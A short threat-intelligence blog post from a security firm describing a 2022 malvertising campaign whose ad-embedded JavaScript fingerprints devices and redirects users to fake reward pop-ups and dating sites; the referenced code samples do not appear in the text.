Your Privacy Matters

We use cookies to enhance your experience on our site and to support our marketing efforts. Please view our Privacy Policy for more information.

Manage Preferences

Active Threats - Oct. 17, 2022

Posted

October 17, 2022

Active Threats

Over the past 3 months, we have been closely monitoring a malicious redirect campaign which automatically redirects the user to random fake reward pop-ups without any user intervention. 

Malicious advertisements




Major malware tactics used

Device fingerprinting

Malicious behavior 

The threat actor has created a group of several malvertising campaigns that follow the same attack/execution pattern. The creative markup contains the initial first stage malicious JavaScript code hardcoded inside it. When the creative gets executed, the malicious code also gets simultaneously executed in the background without any user intervention. 


This time the first stage malicious JavaScript loader isn’t obfuscated which becomes easy for malware researchers to debug and understand the malicious code flow. They have multiple functions to collect user device information and the bad threat actor creates a second stage unique malicious JavaScript long URL, which automatically redirects and deceives the end user by showing fake Walmart/Google search reward pop-ups. Sometimes, based on the geo-location, the user gets redirected to multiple fake adult dating websites too. 


Sample malicious JavaScript function that collects user timezone location and CPU information.


Malicious landing pages


 


Previous Post

No more posts...

We're fresh out of content!

All Posts

Next Post

You're all caught up!

All the news that's fit to print.

All Posts